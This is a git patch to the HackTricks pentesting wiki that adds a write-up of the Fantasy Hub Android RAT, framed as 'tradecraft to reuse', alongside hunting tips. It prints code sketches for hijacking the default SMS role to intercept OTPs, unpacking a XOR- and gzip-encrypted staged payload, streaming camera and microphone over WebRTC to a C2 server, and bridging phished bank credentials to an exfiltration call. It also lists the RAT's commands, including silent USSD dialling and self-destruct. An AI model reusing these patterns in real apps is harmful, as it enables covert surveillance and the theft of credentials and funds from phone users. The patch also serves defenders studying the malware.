From bc302331cfb517417fb5818c68779d25e903eb1e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Fri, 7 Nov 2025 12:41:57 +0000 Subject: [PATCH] Add content from: Fantasy Hub: Another Russian-based RAT-as-a-Service (MaaS) --- .../mobile-phishing-malicious-apps.md | 126 ++++++++++++++++++ .../css-injection/less-code-injection.md | 7 +- 2 files changed, 131 insertions(+), 2 deletions(-) diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index 7ca3e849fb4..1819240e7ce 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md @@ -63,6 +63,9 @@ ## Useful Frida Snippet: Auto-Bypass Invitation Code +
+Frida hook to bypass invitation code + ```python # frida -U -f com.badapp.android -l bypass.js --no-pause # Hook HttpURLConnection write to always return success @@ -82,6 +85,8 @@ Java.perform(function() { }); ``` +
+ ## Indicators (Generic) ``` @@ -228,6 +233,9 @@ Attackers increasingly replace static APK links with a Socket.IO/WebSocket chann Typical client flow observed in the wild: +
+Socket.IO client flow to assemble APK from chunks + ```javascript // Open Socket.IO channel and request payload const socket = io("wss:///ws", { transports: ["websocket"] }); @@ -248,6 +256,8 @@ socket.on("downloadComplete", () => { }); ``` +
+ Why it evades simple controls: - No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. - URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. @@ -274,6 +284,9 @@ Attackers present a WebView pointing to an attacker page and inject a JavaScript Minimal pattern: +
+Android dropper Activity (PackageInstaller Session API) + ```java public class DropperActivity extends Activity { @Override protected void onCreate(Bundle b){ @@ -303,6 +316,8 @@ public class DropperActivity extends Activity { } ``` +
+ HTML on the page: ```html @@ -429,6 +444,115 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - Detect installation/launch of an external NFC-relay app triggered by another app. - For banking: enforce out-of-band confirmations, biometrics-binding, and transaction-limits resistant to on-device automation. +## Fantasy Hub RAT-as-a-Service – tradecraft to reuse (Android) + +Fantasy Hub is a MaaS Android RAT focused on phishing-driven installs and post-consent device takeover. The following techniques generalize to other campaigns. + +### Privilege consolidation via default SMS handler +Requesting the default SMS role yields broad messaging control in a single consent step (OTP/2FA interception, silent forwarding/sending, notification reply/delete), avoiding multiple runtime prompts. + +Minimal request flow: +```java +Intent i = new Intent(android.provider.Telephony.Sms.Intents.ACTION_CHANGE_DEFAULT); +i.putExtra(android.provider.Telephony.Sms.Intents.EXTRA_PACKAGE_NAME, getPackageName()); +startActivity(i); // Shows system chooser to set this app as default SMS +``` +Once granted, abuse `ContentResolver` on `content://sms/*`, `SmsManager`/`Telephony` APIs, and notification listeners/replies to exfiltrate or auto-respond. + +Hunting +- Unexpected ACTION_CHANGE_DEFAULT prompts from non-messaging apps. +- Apps that immediately enumerate `content://sms` upon gaining foreground focus. + +### Native dropper: XOR + gzip (zlib windowBits=31) staged payload +Fantasy Hub ships an encrypted/gzipped secondary payload in assets (e.g., assets/metadata.dat) and unpacks only at runtime from native code (libmetamask_loader.so), reducing static IoCs and frustrating Java-only hooks. + +Unpacker sketch: +```c +// key is a fixed 36-byte pattern; repeat across buffer +void xor_dec(uint8_t *buf, size_t n, const uint8_t *key, size_t klen){ + for(size_t i=0;i zlib+gzip, raw= -15 + // ... feed in->out until Z_STREAM_END (omitted for brevity) + inflateEnd(&s); + return 0; +} +``` +Flow: read assets/metadata.dat → XOR-decrypt → zlib inflate (windowBits=31) → write decoded payload to disk → execute (e.g., load DEX/ELF or spawn component). Samples include environment checks (root/emulator) before decode. + +Hunting +- assets/metadata.dat + native library with strings referencing inflateInit2/31. +- lib name patterns like libmetamask_loader.so; JNI that reads assets then writes opaque bytes to app-private files. + +### Covert live A/V via WebRTC +The RAT downloads WebRTC libs at runtime, then establishes a peer connection to stream camera/mic in real time. A tiny foreground notification (e.g., “Live stream active”) keeps the service alive. + +Minimal pattern: +```java +PeerConnectionFactory f = createFactory(); +PeerConnection pc = f.createPeerConnection(iceServers, observer); +VideoSource vs = f.createVideoSource(false); +VideoCapturer cap = createCameraCapturer(); cap.initialize(...); cap.startCapture(w,h,fps); +AudioSource as = f.createAudioSource(new MediaConstraints()); +pc.addTrack(f.createVideoTrack("v0", vs)); +pc.addTrack(f.createAudioTrack("a0", as)); +// Signal SDP/ICE over HTTP to C2 +``` +Hunting +- Non-Google origins hosting libwebrtc binaries for download by untrusted apps. +- Foreground services with persistent minimal notifications while camera/mic are active. + +### Multi-brand impersonation with activity-alias + permissive WebView +One APK exposes many launcher icons/labels via activity-alias all pointing to a single entry Activity that renders a WebView overlay window for a bank/brand and bridges credentials to native. + +Manifest sketch: +```xml + + + + + + + + +``` +Permissive WebView with JS bridge: +```java +wv.getSettings().setJavaScriptEnabled(true); +wv.addJavascriptInterface(new Object(){ + @android.webkit.JavascriptInterface public void submit(String user, String pin){ exfil(user,pin); } +}, "bridge"); +wv.loadUrl(phishUrlFromC2); +``` +Hunting +- Dense activity-alias usage creating multiple launcher entries per APK. +- WebView with @JavascriptInterface in non-browser apps + dynamic title/icon changes. + +### Telephony abuse, notifications, and kill-switch +- USSD/calls: silently dial via tel: URIs/TelecomManager and select SIM slot; initiate USSD flows (e.g., tel:*123%23). +- Notification control: auto-reply/delete notifications programmatically to intercept or hide evidence. +- Self-destruct: disable receivers/services/components, cancel alarms, and wipe app data on command to reduce forensics. + +Selected command names observed: addContact, getContacts, sendSms, getCallLogs, createImagesZip, downloadMediaFile, webrtc_stream, requestSystemAsset (sensor capture), replyToNotification, deleteNotification, sendUssdWithChoice, executeCommand (dial/USSD), selfDestruct. + +### Defender triage and hunting tips (Fantasy Hub) +Static +- Native loader lib (e.g., libmetamask_loader.so) + assets/metadata.dat; JNI calls to inflateInit2(…, 31). +- Manifest with heavy activity-alias usage and a permissive WebView exposing a JS bridge. + +Behavioral +- Prompt to become default SMS app right after first launch; bursty ZIP/media exfiltration; silent USSD/calls; tiny persistent “Live stream active” notification during A/V capture. +- Runtime download of WebRTC binaries from non-Google origins. + +Network/Config +- Plain HTTP C2 with endpoints for media ZIPs and signaling; Telegram bot tokens/chat IDs embedded in resources or SharedPreferences for alert routing. +- Presence of SharedPreferences keys such as invisible_intercept_enabled; services sampling accelerometer/gyro/light/proximity and beaconing device posture/state. + + ## References - [The Dark Side of Romance: SarangTrap Extortion Campaign](https://zimperium.com/blog/the-dark-side-of-romance-sarangtrap-extortion-campaign) @@ -440,5 +564,7 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) - [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) - [Socket.IO](https://socket.io) +- [Fantasy Hub: Another Russian-based RAT-as-a-Service (MaaS)](https://zimperium.com/blog/fantasy-hub-another-russian-based-rat-as-m-a-a-s) +- [Zimperium IOC – Fantasy Hub (2025-11)](https://github.com/Zimperium/IOC/tree/master/2025-11-FantasyHUB) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/xs-search/css-injection/less-code-injection.md b/src/pentesting-web/xs-search/css-injection/less-code-injection.md index b9d599deb30..6d338df2b68 100644 --- a/src/pentesting-web/xs-search/css-injection/less-code-injection.md +++ b/src/pentesting-web/xs-search/css-injection/less-code-injection.md @@ -1,4 +1,6 @@ -## LESS Code Injection leading to SSRF & Local File Read +# LESS Code Injection leading to SSRF & Local File Read + +{{#include ../../../banners/hacktricks-training.md}} LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used. @@ -59,4 +61,5 @@ curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \ * [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04) * [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/) -* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) \ No newline at end of file +* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258) +{{#include ../../../banners/hacktricks-training.md}}